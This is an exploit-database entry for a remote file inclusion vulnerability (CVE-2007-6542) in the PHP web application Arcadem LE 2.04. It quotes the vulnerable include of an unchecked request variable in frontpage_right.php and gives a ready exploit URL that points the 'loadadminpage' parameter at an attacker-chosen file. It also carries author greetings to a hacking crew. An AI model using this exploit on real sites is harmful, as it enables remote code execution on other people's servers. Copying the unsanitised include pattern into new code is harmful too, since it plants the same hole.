Arcadem LE 2.04 - 'loadadminpage' Remote File Inclusion
Author: KnocKout
type: webapps
platform: php
port:
date_added: 2007-12-20
date_updated:
verified: 1
codes: OSVDB-39802;CVE-2007-6542
tags:
aliases:
screenshot_url:
application_url:
Arcadem LE <= 2.04 Remote File Include Vulnerability
Author : KnocKout
Greetz to : CoRSaNTuRK , BORDO , CWneSTer , By-Ajan , User , 44ahmetov , CoBRa_21 , Khirash , CWSearcher , idam
Cyber-Warrior / CW Exploiter TIM
--------------------------------------
Script : Arcadem LE
Version : 2.04
Download : http://www.agaresmedia.com/downloads/Arcadem_LE_2.04.zip
=======================================================
Vulnerability in frontpage_right.php ;
<?PHP include($loadadminpage); ?>
Exploit : http://localsite/path/admin/frontpage_right.php?loadadminpage=[File]
=========================================================
# milw0rm.com [2007-12-21]